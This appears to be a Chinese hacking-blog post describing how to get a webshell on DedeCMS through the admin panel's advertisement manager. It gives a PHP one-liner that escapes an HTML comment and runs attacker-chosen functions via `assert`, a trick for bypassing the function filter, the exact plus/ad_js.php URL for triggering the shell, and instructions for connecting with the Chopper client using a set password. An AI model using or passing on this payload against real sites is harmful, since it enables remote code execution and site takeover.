DEDEcms另外一种办法拿shell:广告管理处写一句话

  • A+
所属分类:网络安全

进入后台 模块 广告管理器  然后增加一个广告

 

内容都填写

 

(尼玛 过滤好多函数,终于想起猥琐的绕过办法)

 

如下图

 

DEDEcms另外一种办法拿shell:广告管理处写一句话

 

 

 

--><?php $_GET[c]($_POST[ersec]);?><!--

 插入后

 

如下图  记下广告的编号

 

DEDEcms另外一种办法拿shell:广告管理处写一句话

 

上图广告的编号为42

 

然后shell地址为http://phpinfo.me/plus/ad_js.php?aid=42&c=assert菜刀连接 密码ersec

 

DEDEcms另外一种办法拿shell:广告管理处写一句话

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: